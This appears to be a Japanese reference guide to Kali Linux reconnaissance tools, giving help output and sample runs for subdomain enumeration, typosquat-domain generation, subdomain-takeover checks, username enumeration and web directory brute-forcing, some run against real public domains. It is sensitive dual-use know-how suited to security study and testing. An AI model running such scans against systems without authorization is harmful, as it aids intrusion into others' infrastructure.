vowel-swap githob.com 173.239.5.6 NS:ns1.expiereddnsmanager.com MX:mx7.githob.com
vowel-swap gethub.com 203.242.255.30 NS:ns.ktnet.co.kr
dnsx
DNSレコードの照会やサブドメインのブルートフォースなどの機能を提供します。
■ 使用方法
root@kali:~# dnsx --help
Usage:
dnsx [flags]
Flags:
INPUT:
-l, -list string list of sub(domains)/hosts to resolve (file or stdin)
-d, -domain string list of domain to bruteforce (file or comma separated or stdin)
-w, -wordlist string list of words to bruteforce (file or comma separated or stdin)
QUERY:
-a query A record (default)
-aaaa query AAAA record
-cname query CNAME record
-ns query NS record
-txt query TXT record
-srv query SRV record
-ptr query PTR record
-mx query MX record
-soa query SOA record
-axfr query AXFR
-caa query CAA record
FILTER:
-re, -resp display dns response
-ro, -resp-only display dns response only
-rc, -rcode string filter result by dns status code (eg. -rcode noerror,servfail,refused)
PROBE:
-cdn display cdn name
-asn display host asn information
RATE-LIMIT:
-t, -threads int number of concurrent threads to use (default 100)
-rl, -rate-limit int number of dns request/second to make (disabled as default) (default -1)
UPDATE:
-up, -update update dnsx to latest version
-duc, -disable-update-check disable automatic dnsx update check
OUTPUT:
-o, -output string file to write output
-json write output in JSONL(ines) format
DEBUG:
-hc, -health-check run diagnostic check up
-silent display only results in the output
-v, -verbose display verbose output
-raw, -debug display raw dns response
-stats display stats of the running scan
-version display version of dnsx
OPTIMIZATION:
-retry int number of dns attempts to make (must be at least 1) (default 2)
-hf, -hostsfile use system host file
-trace perform dns tracing
-trace-max-recursion int Max recursion for dns trace (default 32767)
-resume resume existing scan
-stream stream mode (wordlist, wildcard, stats and stop/resume will be disabled)
CONFIGURATIONS:
-r, -resolver string list of resolvers to use (file or comma separated)
-wt, -wildcard-threshold int wildcard filter threshold (default 5)
-wd, -wildcard-domain string domain name for wildcard filtering (other flags will be ignored - only json output is supported)
■ 使用例
# amazonaws.comのサブドメインのリストにAレコードの情報を追加する
root@kali:~# subfinder -silent -d amazonaws.com | dnsx -silent -a -resp
a323fac12b391484da5fea5d8d424c9f-c145ad03356b1979.elb.af-south-1.amazonaws.com [13.244.236.13]
a323fac12b391484da5fea5d8d424c9f-c145ad03356b1979.elb.af-south-1.amazonaws.com [13.244.237.113]
a323fac12b391484da5fea5d8d424c9f-c145ad03356b1979.elb.af-south-1.amazonaws.com [13.244.249.223]
acm-cws.af-south-1.amazonaws.com [13.246.73.207]
acm-cws.af-south-1.amazonaws.com [13.246.246.221]
acm-cws.af-south-1.amazonaws.com [13.247.40.65]
aatb.us-gov-west-1.amazonaws.com [52.119.209.92]
a0e559146bc8148018f27b1c3affa444-8f41ca81b59b99d8.elb.af-south-1.amazonaws.com [13.246.88.96]
a0e559146bc8148018f27b1c3affa444-8f41ca81b59b99d8.elb.af-south-1.amazonaws.com [13.246.210.124]
a0e559146bc8148018f27b1c3affa444-8f41ca81b59b99d8.elb.af-south-1.amazonaws.com [13.245.156.147]
acm.eu-west-1.amazonaws.com [3.253.219.235]
[...]
Fierce
指定されたドメインに対してDNSをスキャンすることで非連続のIPスペースとホスト名を見つけます。
■ 使用方法
root@kali:~# fierce --help
usage: fierce [-h] [--domain DOMAIN] [--connect] [--wide] [--traverse TRAVERSE] [--search SEARCH [SEARCH ...]] [--range RANGE] [--delay DELAY]
[--subdomains SUBDOMAINS [SUBDOMAINS ...] | --subdomain-file SUBDOMAIN_FILE] [--dns-servers DNS_SERVERS [DNS_SERVERS ...] | --dns-file DNS_FILE]
[--tcp]
A DNS reconnaissance tool for locating non-contiguous IP space.
options:
-h, --help show this help message and exit
--domain DOMAIN domain name to test
--connect attempt HTTP connection to non-RFC 1918 hosts
--wide scan entire class c of discovered records
--traverse TRAVERSE scan IPs near discovered records, this won\'t enter adjacent class c\'s
--search SEARCH [SEARCH ...]
filter on these domains when expanding lookup
--range RANGE scan an internal IP range, use cidr notation
--delay DELAY time to wait between lookups
--subdomains SUBDOMAINS [SUBDOMAINS ...]
use these subdomains
--subdomain-file SUBDOMAIN_FILE
use subdomains specified in this file (one per line)
--dns-servers DNS_SERVERS [DNS_SERVERS ...]
use these dns servers for reverse lookups
--dns-file DNS_FILE use dns servers specified in this file for reverse lookups (one per line)
--tcp use TCP instead of UDP
■ 使用例
root@kali:~# fierce --domain yahoo.co.jp
NS: ns02.yahoo.co.jp. ns11.yahoo.co.jp. ns12.yahoo.co.jp. ns01.yahoo.co.jp.
SOA: yahoo.co.jp. (182.22.31.124)
Zone: failure
Wildcard: failure
Found: accounts.yahoo.co.jp. (183.79.253.220)
Found: ads.yahoo.co.jp. (183.79.218.174)
Found: affiliate.yahoo.co.jp. (124.83.185.124)
Found: am.yahoo.co.jp. (124.83.185.124)
Found: app.yahoo.co.jp. (124.83.185.124)
Found: bb.yahoo.co.jp. (124.83.185.124)
Found: biz.yahoo.co.jp. (124.83.185.124)
Found: business.yahoo.co.jp. (124.83.185.124)
Found: calendar.yahoo.co.jp. (183.79.253.220)
Found: cms.yahoo.co.jp. (100.101.225.12)
Found: developer.yahoo.co.jp. (183.79.250.251)
[...]
Found: photos.yahoo.co.jp. (182.22.24.252)
Found: pm.yahoo.co.jp. (182.22.24.252)
Found: pr.yahoo.co.jp. (182.22.24.252)
Found: privacy.yahoo.co.jp. (182.22.24.252)
Found: promo.yahoo.co.jp. (182.22.24.252)
MassDNS
大量のドメイン名を高速で名前解決できるDNSスタブリゾルバです。
■ 使用方法
root@kali:~# massdns --help
Usage: massdns [options] [domainlist]
-b --bindto Bind to IP address and port. (Default: 0.0.0.0:0)
--busy-poll Use busy-wait polling instead of epoll.
-c --resolve-count Number of resolves for a name before giving up. (Default: 50)
--drop-group Group to drop privileges to when running as root. (Default: nogroup)
--drop-user User to drop privileges to when running as root. (Default: nobody)
--filter Only output packets with the specified response code.
--flush Flush the output file whenever a response was received.
-h --help Show this help.
--ignore Do not output packets with the specified response code.
-i --interval Interval in milliseconds to wait between multiple resolves of the same
domain. (Default: 500)
-l --error-log Error log file path. (Default: /dev/stderr)
--norecurse Use non-recursive queries. Useful for DNS cache snooping.
-o --output Flags for output formatting.
--predictable Use resolvers incrementally. Useful for resolver tests.
--processes Number of processes to be used for resolving. (Default: 1)
-q --quiet Quiet mode.
--rcvbuf Size of the receive buffer in bytes.
--retry Unacceptable DNS response codes. (Default: REFUSED)
-r --resolvers Text file containing DNS resolvers.
--root Do not drop privileges when running as root. Not recommended.
-s --hashmap-size Number of concurrent lookups. (Default: 10000)
--sndbuf Size of the send buffer in bytes.
--status-format Format for real-time status updates, json or ansi (Default: ansi)
--sticky Do not switch the resolver when retrying.
--socket-count Socket count per process. (Default: 1)
-t --type Record type to be resolved. (Default: A)
--verify-ip Verify IP addresses of incoming replies.
-w --outfile Write to the specified output file instead of standard output.
Output flags:
S - simple text output
F - full text output
B - binary output
J - ndjson output
Advanced flags for the simple output mode:
d - Include records from the additional section.
i - Indent any reply record.
l - Separate replies using a line feed.
m - Only output reply records that match the question name.
n - Include records from the answer section.
q - Print the question.
r - Print the question with resolver IP address, Unix timestamp and return code prepended.
s - Separate packet sections using a line feed.
t - Include TTL and record class within the output.
u - Include records from the authority section.
■ 使用例
root@kali:~# massdns --resolvers resolvers.txt gov-domains.txt --outfile results.txt
Processed queries: 410
Received packets: 553
Progress: 100.00% (00 h 00 min 08 sec / 00 h 00 min 08 sec)
Current incoming rate: 16 pps, average: 68 pps
Current success rate: 16 pps, average: 50 pps
Finished total: 410, success: 410 (100.00%)
[...]
Response: | Success: | Total:
OK: | 323 ( 78.78%) | 410 ( 74.14%)
NXDOMAIN: | 75 ( 18.29%) | 85 ( 15.37%)
SERVFAIL: | 12 ( 2.93%) | 18 ( 3.25%)
REFUSED: | 0 ( 0.00%) | 40 ( 7.23%)
FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
root@kali:~# cat results.txt
;; Server: 172.64.37.8:53
;; Size: 104
;; Unix time: 1729577020
;; ->>HEADER\<<- opcode: QUERY, status: NOERROR, id: 43092
;; flags: qr rd ra ; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
koeki-info.go.jp. IN A
;; AUTHORITY SECTION:
koeki-info.go.jp. 900 IN SOA ns000.d-53.net. dns-managers.iij.ad.jp. 217 3600 600 604800 900
;; Server: 172.64.37.38:53
;; Size: 108
;; Unix time: 1729577020
;; ->>HEADER\<<- opcode: QUERY, status: NOERROR, id: 18513
;; flags: qr rd ra ; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
fsc.go.jp. IN A
;; AUTHORITY SECTION:
fsc.go.jp. 900 IN SOA ns-491.awsdns-61.com. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
[...]
Subjack
指定したサブドメインにテイクオーバーの脆弱性があるかどうかチェックします。
参考
■ 使用方法
root@kali:~# subjack --help
Usage of subjack:
-a Find those hidden gems by sending requests to every URL. (Default: Requests are only sent to URLs with identified CNAMEs).
-c string
Path to configuration file. (default "/usr/share/subjack/fingerprints.json")
-d string
Domain.
-m Flag the presence of a dead record, but valid CNAME entry.
-o string
Output results to file (Subjack will write JSON if file ends with '.json').
-ssl
Force HTTPS connections (May increase accuracy (Default: http://).
-t int
Number of concurrent threads (Default: 10). (default 10)
-timeout int
Seconds to wait before connection timeout (Default: 10). (default 10)
-v Display more information per each request.
-w string
Path to wordlist.
■ 使用例
# 調査対象のサブドメインのリストを作成
root@kali:~# curl -N -G https://api.merklemap.com/search?query=*.*****.jp | jq -r '.results[].domain' | sed 's/\*\.//' | anew | sort > domains.txt
# サブドメインのリストに対してチェックを実行
root@kali:~# subjack -w domains.txt -t 30 -timeout 30 -ssl -v 3
[Not Vulnerable] api.geocoder.address-br.*****.jp
[Not Vulnerable] dmp-official-staging.*****.jp
[Not Vulnerable] dmp-official.*****.jp
[Not Vulnerable] dmp-official-dev.*****.jp
[Not Vulnerable] external.id.mykey.*****.jp
[Not Vulnerable] geocoder.address-br.*****.jp
[Not Vulnerable] id.mykey.*****.jp
[Not Vulnerable] lcm.stg.smp.*****.jp
[Not Vulnerable] lcm.smp.*****.jp
[Not Vulnerable] lcm.tst.smp.*****.jp
[Not Vulnerable] snas.*****.jp
[Not Vulnerable] dv.emc.*****.jp
[Not Vulnerable] dv.emc.*****.jp
[Not Vulnerable] api.register.deve-gkpb.*****.jp
[Not Vulnerable] api.register.deve-gkpb.*****.jp
[Not Vulnerable] api.kktg.*****.jp
[...]
URLCrazy
指定されたドメインと類似したドメインをファジングアルゴリズムで生成し、なりすましドメインを生成・検出します。
■ 使用方法
root@kali:~# urlcrazy --help
Usage: ./urlcrazy [options] domain
Options
-k, --keyboard=LAYOUT Options are: qwerty, azerty, qwertz, dvorak (default: qwerty)
-p, --popularity Check domain popularity with Google
-r, --no-resolve Do not resolve DNS
-i, --show-invalid Show invalid domain names
-f, --format=TYPE Human readable, JSON, or CSV (default: human readable)
-o, --output=FILE Output file
-n, --nocolor Disable colour
-d, --debug Enable debugging output for development
-h, --help This help
-v, --version Print version information. This version is 0.7.3
■ 使用例
root@kali:~# urlcrazy github.com
URLCrazy Domain Report
Domain : github.com
Keyboard : qwerty
At : 2024-11-27 22:21:30 +0000
# Please wait. 2028 hostnames to process
Typo Type Typo Domain IP Country NameServer
MailServer
-----------------------------------------------------------------------------------------------------------------------------------------
Original github.com 20.27.177.113 UNITED STATES (US) dns4.p08.nsone.net.
aspmx.l.google.com.
Character Omission gihub.com 192.198.80.150 UNITED STATES (US) ns1.smtmdns.com.
Character Omission githb.com 82.192.82.225 NETHERLANDS (NL) ns2.kirklanddc.com.
mail.h-email.net.
[...]
Character Repeat ggithub.com
Character Repeat giithub.com 199.59.243.227 UNITED STATES (US) ns2.bodis.com.
[...]
Character Swap gihtub.com
Character Swap githbu.com 199.115.115.116 UNITED STATES (US) ns2.weaponizedcow.com.
[...]
Character Replacement fithub.com 5.22.145.16 GERMANY (DE) ns3.monikerdns.net.
aspmx.l.google.com.
Character Replacement girhub.com 173.239.5.6 UNITED STATES (US) ns1.expiereddnsmanager.com.
mx7.girhub.com.
[...]
Character Insertion gfithub.com 46.166.189.98 NETHERLANDS (NL) ns-usa.topdns.com.
Character Insertion ghithub.com 103.224.212.214 AUSTRALIA (AU) ns16.abovedomains.com.
park-mx.above.com.
[...]
Vowel Swap gathub.com 216.250.120.46 UNITED STATES (US) ns1028.ui-dns.biz.
mx01.ionos.com.
Vowel Swap gethub.com 203.242.255.30 KOREA REPUBLIC OF (KR) snsp.ktnet.co.kr.
[...]
Bit Flipping gidhub.com ulla.ns.cloudflare.com.
Bit Flipping giphub.com
[...]
Wrong TLD github.xxx
Wrong TLD github.xyz
[...]
Web Crawling
apache-users
Apacheのmod_userdirが有効になっているサーバーにユーザー名列挙攻撃を行い、システムのユーザー名一覧を取得します。
■ 使用方法
root@kali:~# apache-users --help
USAGE: apache-users [-h 1.2.3.4] [-l names] [-p 80] [-s (SSL Support 1=true 0=false)] [-e 403 (http code)] [-t threads]
■ 使用例
# 指定されたユーザーが存在し、ユーザーのホームディレクトリにWebサーバーのアクセス権限がない場合
# ステータスコード403を返すため、403でユーザーの存在有無を確認する
root@kali:~# apache-users -h 192.168.11.4 -l users.txt -p 80 -s 0 -e 403 -t 10
hello exists on 192.168.11.4
Arjun
APIエンドポイントで使用可能なクエリパラメーターを単語リストをもとに検出します。
■ 使用方法
root@kali:~# arjun --help
usage: arjun [-h] [-u URL] [-o JSON_FILE] [-oT TEXT_FILE] [-oB [BURP_PROXY]] [-d DELAY] [-t THREADS] [-w WORDLIST] [-m METHOD]
[-i [IMPORT_FILE]] [-T TIMEOUT] [-c CHUNKS] [-q] [--rate-limit RATE_LIMIT] [--headers [HEADERS]]
[--passive [PASSIVE]] [--stable] [--include INCLUDE] [--disable-redirects]
options:
-h, --help show this help message and exit
-u URL Target URL
-o JSON_FILE, -oJ JSON_FILE
Path for json output file.
-oT TEXT_FILE Path for text output file.
-oB [BURP_PROXY] Output to Burp Suite Proxy. Default is 127.0.0.1:8080.
-d DELAY Delay between requests in seconds. (default: 0)
-t THREADS Number of concurrent threads. (default: 5)
-w WORDLIST Wordlist file path. (default: {arjundir}/db/large.txt)
-m METHOD Request method to use: GET/POST/XML/JSON/HEADERS. (default: GET)
-i [IMPORT_FILE] Import target URLs from file.
-T TIMEOUT HTTP request timeout in seconds. (default: 15)
-c CHUNKS Chunk size. The number of parameters to be sent at once
-q Quiet mode. No output.
--rate-limit RATE_LIMIT
Max number of requests to be sent out per second (default: 9999)
--headers [HEADERS] Add headers. Separate multiple headers with a new line.
--passive [PASSIVE] Collect parameter names from passive sources like wayback, commoncrawl and otx.
--stable Prefer stability over speed.
--include INCLUDE Include this data in every request.
--disable-redirects disable redirects
■ 使用例
# デフォルトの単語リストを使用してクエリパラメーターを検出
root@kali:~# arjun -u http://192.168.11.4/customers
[...]
[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Analysing HTTP response for potential parameter names
[*] Logicforcing the URL endpoint
[✓] parameter detected: email, based on: body length
[✓] parameter detected: object, based on: body length
[✓] parameter detected: q, based on: body length
[✓] parameter detected: created, based on: body length
[✓] parameter detected: discount, based on: body length
[✓] parameter detected: metadata, based on: body length
[✓] parameter detected: description, based on: body length
[✓] parameter detected: callback, based on: body length
[✓] parameter detected: balance, based on: body length
[✓] parameter detected: name, based on: body length
[✓] parameter detected: currency, based on: body length
[✓] parameter detected: id, based on: body length
[✓] parameter detected: shipping, based on: body length
[✓] parameter detected: phone, based on: body length
[✓] parameter detected: address, based on: body length
[✓] parameter detected: _page, based on: http headers
[+] Parameters found: email, object, q, created, discount, metadata, description, callback, balance, name, currency, id, shipping, phone, address, _page
DIRB
Webサーバに対して単語リストを使用したウェブコンテンツ探索を行います。
■ 使用方法
root@kali:~# dirb
dirb <url_base> [<wordlist_file(s)>] [options]
========================= NOTES =========================
<url_base> : Base URL to scan. (Use -resume for session resuming)
<wordlist_file(s)> : List of wordfiles. (wordfile1,wordfile2,wordfile3...)
======================== HOTKEYS ========================
'n' -> Go to next directory.
'q' -> Stop scan. (Saving state for resume)
'r' -> Remaining scan stats.
======================== OPTIONS ========================
-a <agent_string> : Specify your custom USER_AGENT.
-b : Use path as is.
-c <cookie_string> : Set a cookie for the HTTP request.
-E <certificate> : path to the client certificate.
-f : Fine tunning of NOT_FOUND (404) detection.
-H <header_string> : Add a custom header to the HTTP request.
-i : Use case-insensitive search.
-l : Print "Location" header when found.
-N <nf_code>: Ignore responses with this HTTP code.
-o <output_file> : Save output to disk.
-p <proxy[:port]> : Use this proxy. (Default port is 1080)
-P <proxy_username:proxy_password> : Proxy Authentication.
-r : Don\'t search recursively.
-R : Interactive recursion. (Asks for each directory)
-S : Silent Mode. Don\'t show tested words. (For dumb terminals)
-t : Don\'t force an ending '/' on URLs.
-u <username:password> : HTTP Authentication.
-v : Show also NOT_FOUND pages.
-w : Don\'t stop on WARNING messages.
-X <extensions> / -x <exts_file> : Append each word with this extensions.
-z <millisecs> : Add a milliseconds delay to not cause excessive Flood.
======================== EXAMPLES =======================
dirb http://url/directory/ (Simple Test)
dirb http://url/ -X .html (Test files with '.html' extension)
dirb http://url/ /usr/share/dirb/wordlists/vulns/apache.txt (Test with apache.txt wordlist)
dirb https://secure_url/ (Simple Test with SSL)
■ 使用例
# ルート直下のディレクトリを探索
root@kali:~# dirb http://192.168.11.4/ words.txt -r
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Sep 25 11:45:45 2024
URL_BASE: http://192.168.11.4/
WORDLIST_FILES: words.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 87568
---- Scanning URL: http://192.168.11.4/ ----
==> DIRECTORY: http://192.168.11.4/admin/
==> DIRECTORY: http://192.168.11.4/system/
==> DIRECTORY: http://192.168.11.4/manual/
==> DIRECTORY: http://192.168.11.4/logs/
==> DIRECTORY: http://192.168.11.4/2023/
==> DIRECTORY: http://192.168.11.4/2024/
-----------------
END_TIME: Wed Sep 25 11:48:56 2024
# logsディレクトリ直下のログファイルを探索
root@kali:~# dirb http://192.168.11.4/logs/ words.txt -X .log
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Sep 25 12:18:35 2024
URL_BASE: http://192.168.11.4/logs/
WORDLIST_FILES: words.txt
EXTENSIONS_LIST: (.log) | (.log) [NUM = 1]
-----------------
GENERATED WORDS: 87568
---- Scanning URL: http://192.168.11.4/logs/ ----
+ http://192.168.11.4/logs/stats.log (CODE:200|SIZE:29653)
+ http://192.168.11.4/logs/apps.log (CODE:200|SIZE:198823)
+ http://192.168.11.4/logs/messages.log (CODE:200|SIZE:58863)
-----------------
END_TIME: Wed Sep 25 12:21:37 2024
dirsearch
Webサーバに対して単語リストを使用したウェブコンテンツ探索を行います。
■ 使用方法
root@kali:~# dirsearch --help
Usage: dirsearch.py [-u|--url] target [-e|--extensions] extensions [options]
Options:
--version show program\'s version number and exit
-h, --help show this help message and exit
Mandatory:
-u URL, --url=URL Target URL(s), can use multiple flags
-l PATH, --url-file=PATH
URL list file
--stdin Read URL(s) from STDIN
--cidr=CIDR Target CIDR
--raw=PATH Load raw HTTP request from file (use `--scheme` flag
to set the scheme)
-s SESSION_FILE, --session=SESSION_FILE
Session file
--config=PATH Full path to config file, see 'config.ini' for example
(Default: config.ini)
Dictionary Settings:
-w WORDLISTS, --wordlists=WORDLISTS
Customize wordlists (separated by commas)
-e EXTENSIONS, --extensions=EXTENSIONS
Extension list separated by commas (e.g. php,asp)
-f, --force-extensions
Add extensions to the end of every wordlist entry. By
default dirsearch only replaces the %EXT% keyword with
extensions
-O, --overwrite-extensions
Overwrite other extensions in the wordlist with your
extensions (selected via `-e`)
--exclude-extensions=EXTENSIONS
Exclude extension list separated by commas (e.g.
asp,jsp)
--remove-extensions
Remove extensions in all paths (e.g. admin.php ->
admin)
--prefixes=PREFIXES
Add custom prefixes to all wordlist entries (separated
by commas)
--suffixes=SUFFIXES
Add custom suffixes to all wordlist entries, ignore
directories (separated by commas)
-U, --uppercase Uppercase wordlist
-L, --lowercase Lowercase wordlist
-C, --capital Capital wordlist
General Settings:
-t THREADS, --threads=THREADS
Number of threads
-r, --recursive Brute-force recursively
--deep-recursive Perform recursive scan on every directory depth (e.g.
api/users -> api/)
--force-recursive Do recursive brute-force for every found path, not
only directories
-R DEPTH, --max-recursion-depth=DEPTH
Maximum recursion depth
--recursion-status=CODES
Valid status codes to perform recursive scan, support
ranges (separated by commas)
--subdirs=SUBDIRS Scan sub-directories of the given URL[s] (separated by
commas)
--exclude-subdirs=SUBDIRS
Exclude the following subdirectories during recursive
scan (separated by commas)
-i CODES, --include-status=CODES
Include status codes, separated by commas, support
ranges (e.g. 200,300-399)
-x CODES, --exclude-status=CODES
Exclude status codes, separated by commas, support
ranges (e.g. 301,500-599)
--exclude-sizes=SIZES
Exclude responses by sizes, separated by commas (e.g.
0B,4KB)
--exclude-text=TEXTS
Exclude responses by text, can use multiple flags
--exclude-regex=REGEX
Exclude responses by regular expression
--exclude-redirect=STRING
Exclude responses if this regex (or text) matches
redirect URL (e.g. '/index.html')
--exclude-response=PATH
Exclude responses similar to response of this page,
path as input (e.g. 404.html)
--skip-on-status=CODES
Skip target whenever hit one of these status codes,
separated by commas, support ranges
--min-response-size=LENGTH
Minimum response length
--max-response-size=LENGTH
Maximum response length
--max-time=SECONDS Maximum runtime for the scan
--exit-on-error Exit whenever an error occurs
Request Settings:
-m METHOD, --http-method=METHOD
HTTP method (default: GET)
-d DATA, --data=DATA
HTTP request data
--data-file=PATH File contains HTTP request data
-H HEADERS, --header=HEADERS
HTTP request header, can use multiple flags
--header-file=PATH File contains HTTP request headers
-F, --follow-redirects
Follow HTTP redirects
--random-agent Choose a random User-Agent for each request
--auth=CREDENTIAL Authentication credential (e.g. user:password or
bearer token)
--auth-type=TYPE Authentication type (basic, digest, bearer, ntlm, jwt,
oauth2)
--cert-file=PATH File contains client-side certificate
--key-file=PATH File contains client-side certificate private key
(unencrypted)
--user-agent=USER_AGENT
--cookie=COOKIE
Connection Settings:
--timeout=TIMEOUT Connection timeout
--delay=DELAY Delay between requests
--proxy=PROXY Proxy URL (HTTP/SOCKS), can use multiple flags
--proxy-file=PATH File contains proxy servers
--proxy-auth=CREDENTIAL
Proxy authentication credential
--replay-proxy=PROXY
Proxy to replay with found paths
--tor Use Tor network as proxy
--scheme=SCHEME Scheme for raw request or if there is no scheme in the
URL (Default: auto-detect)
--max-rate=RATE Max requests per second
--retries=RETRIES Number of retries for failed requests
--ip=IP Server IP address
Advanced Settings:
--crawl Crawl for new paths in responses
View Settings:
--full-url Full URLs in the output (enabled automatically in
quiet mode)
--redirects-history
Show redirects history
--no-color No colored output
-q, --quiet-mode Quiet mode
Output Settings:
-o PATH, --output=PATH
Output file
--format=FORMAT Report format (Available: simple, plain, json, xml,
md, csv, html, sqlite)
--log=PATH Log file
■ 使用例
# ルート直下のディレクトリを探索
root@kali:~# dirsearch -u http://192.168.11.4/ -w words.txt
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 87649
Output File: /reports/http_192.168.11.4/__24-09-26_00-08-19.txt
Target: http://192.168.11.4/
[00:08:19] Starting:
[00:08:19] 301 - 230B - /admin -> http://192.168.11.4/admin/
[00:08:21] 301 - 231B - /system -> http://192.168.11.4/system/
[00:08:21] 301 - 231B - /manual -> http://192.168.11.4/manual/
[00:08:25] 301 - 229B - /logs -> http://192.168.11.4/logs/
[00:09:16] 301 - 229B - /2023 -> http://192.168.11.4/2023/
[00:09:16] 301 - 229B - /2024 -> http://192.168.11.4/2024/
Task Completed
# logsディレクトリ直下のログファイルを探索
# "-e log -f"を指定して実行する場合はディレクトリの探索も行われるため"--suffixes .log"で代用
root@kali:~# dirsearch -u http://192.168.11.4/logs/ --suffixes .log -w words.txt
Extensions: php, aspx, jsp, html, js | Suffixes: .log | HTTP method: GET | Threads: 25 | Wordlist size: 87649
Output File: /reports/http_192.168.11.4/_logs__24-09-26_01-33-39.txt
Target: http://192.168.11.4/
[01:33:39] Starting: logs/
[01:33:39] 200 - 6B - /logs/stats.log
[01:33:39] 200 - 6B - /logs/apps.log
[01:33:41] 200 - 6B - /logs/messages.log
Task Completed
feroxbuster
ブルートフォースと単語リストを組み合わせて、ターゲットディレクトリ内のリンクされていないコンテンツを検索します。
■ 使用方法
root@kali:~# feroxbuster --help
Usage: feroxbuster [OPTIONS]
Options:
-h, --help
Print help (see a summary with '-h')
-V, --version
Print version
Target selection:
-u, --url <URL>
The target URL (required, unless [--stdin || --resume-from || --request-file] used)
--stdin
Read url(s) from STDIN
--resume-from <STATE_FILE>
State file from which to resume a partially complete scan (ex. --resume-from ferox-1606586780.state)
--request-file <REQUEST_FILE>
Raw HTTP request file to use as a template for all requests
Composite settings:
--burp
Set --proxy to http://127.0.0.1:8080 and set --insecure to true
--burp-replay
Set --replay-proxy to http://127.0.0.1:8080 and set --insecure to true
--smart
Set --auto-tune, --collect-words, and --collect-backups to true
--thorough
Use the same settings as --smart and set --collect-extensions and --scan-dir-listings to true
Proxy settings:
-p, --proxy <PROXY>
Proxy to use for requests (ex: http(s)://host:port, socks5(h)://host:port)
-P, --replay-proxy <REPLAY_PROXY>
Send only unfiltered requests through a Replay Proxy, instead of all requests
-R, --replay-codes <REPLAY_CODE>...
Status Codes to send through a Replay Proxy when found (default: --status-codes value)
Request settings:
-a, --user-agent <USER_AGENT>
Sets the User-Agent (default: feroxbuster/2.11.0)
-A, --random-agent
Use a random User-Agent
-x, --extensions <FILE_EXTENSION>...
File extension(s) to search for (ex: -x php -x pdf js); reads values (newline-separated) from file if input starts with an @ (ex: @ext.txt)
-m, --methods <HTTP_METHODS>...
Which HTTP request method(s) should be sent (default: GET)
--data <DATA>
Request\'s Body; can read data from a file if input starts with an @ (ex: @post.bin)
-H, --headers <HEADER>...
Specify HTTP headers to be used in each request (ex: -H Header:val -H 'stuff: things')
-b, --cookies <COOKIE>...
Specify HTTP cookies to be used in each request (ex: -b stuff=things)
-Q, --query <QUERY>...
Request\'s URL query parameters (ex: -Q token=stuff -Q secret=key)
-f, --add-slash
Append / to each request\'s URL
--protocol <PROTOCOL>
Specify the protocol to use when targeting via --request-file or --url with domain only (default: https)
Request filters:
--dont-scan <URL>...
URL(s) or Regex Pattern(s) to exclude from recursion/scans
Response filters:
-S, --filter-size <SIZE>...
Filter out messages of a particular size (ex: -S 5120 -S 4927,1970)
-X, --filter-regex <REGEX>...
Filter out messages via regular expression matching on the response\'s body/headers (ex: -X '^ignore me$')
-W, --filter-words <WORDS>...
Filter out messages of a particular word count (ex: -W 312 -W 91,82)
-N, --filter-lines <LINES>...
Filter out messages of a particular line count (ex: -N 20 -N 31,30)
-C, --filter-status <STATUS_CODE>...
Filter out status codes (deny list) (ex: -C 200 -C 401)
--filter-similar-to <UNWANTED_PAGE>...
Filter out pages that are similar to the given page (ex. --filter-similar-to http://site.xyz/soft404)
-s, --status-codes <STATUS_CODE>...
Status Codes to include (allow list) (default: All Status Codes)
Client settings:
-T, --timeout <SECONDS>
Number of seconds before a client\'s request times out (default: 7)
-r, --redirects
Allow client to follow redirects
-k, --insecure
Disables TLS certificate validation in the client
--server-certs <PEM|DER>...
Add custom root certificate(s) for servers with unknown certificates
--client-cert <PEM>
Add a PEM encoded certificate for mutual authentication (mTLS)
--client-key <PEM>
Add a PEM encoded private key for mutual authentication (mTLS)
Scan settings:
-t, --threads <THREADS>
Number of concurrent threads (default: 50)
-n, --no-recursion
Do not scan recursively
-d, --depth <RECURSION_DEPTH>
Maximum recursion depth, a depth of 0 is infinite recursion (default: 4)
--force-recursion
Force recursion attempts on all 'found' endpoints (still respects recursion depth)
--dont-extract-links
Don\'t extract links from response body (html, javascript, etc...)
-L, --scan-limit <SCAN_LIMIT>
Limit total number of concurrent scans (default: 0, i.e. no limit)
--parallel <PARALLEL_SCANS>
Run parallel feroxbuster instances (one child process per url passed via stdin)
--rate-limit <RATE_LIMIT>
Limit number of requests per second (per directory) (default: 0, i.e. no limit)
--time-limit <TIME_SPEC>
Limit total run time of all scans (ex: --time-limit 10m)
-w, --wordlist <FILE>
Path or URL of the wordlist
--auto-tune
Automatically lower scan rate when an excessive amount of errors are encountered
--auto-bail
Automatically stop scanning when an excessive amount of errors are encountered
-D, --dont-filter
Don\'t auto-filter wildcard responses
--scan-dir-listings
Force scans to recurse into directory listings
Dynamic collection settings:
-E, --collect-extensions
Automatically discover extensions and add them to --extensions (unless they\'re in --dont-collect)
-B, --collect-backups [<collect_backups>...]
Automatically request likely backup extensions for "found" urls (default: ~, .bak, .bak2, .old, .1)
-g, --collect-words
Automatically discover important words from within responses and add them to the wordlist
-I, --dont-collect <FILE_EXTENSION>...
File extension(s) to Ignore while collecting extensions (only used with --collect-extensions)
Output settings:
-v, --verbosity...
Increase verbosity level (use -vv or more for greater effect. [CAUTION] 4 -v\'s is probably too much)
--silent
Only print URLs (or JSON w/ --json) + turn off logging (good for piping a list of urls to other commands)
-q, --quiet
Hide progress bars and banner (good for tmux windows w/ notifications)
--json
Emit JSON logs to --output and --debug-log instead of normal text
-o, --output <FILE>
Output file to write results to (use w/ --json for JSON entries)
--debug-log <FILE>
Output file to write log entries (use w/ --json for JSON entries)
--no-state
Disable state output file (*.state)
--limit-bars <NUM_BARS_TO_SHOW>
Number of directory scan bars to show at any given time (default: no limit)
Update settings:
-U, --update
Update feroxbuster to the latest version
NOTE:
Options that take multiple values are very flexible. Consider the following ways of specifying
extensions:
feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
The command above adds .pdf, .js, .html, .php, .txt, .json, and .docx to each url
All of the methods above (multiple flags, space separated, comma separated, etc...) are valid
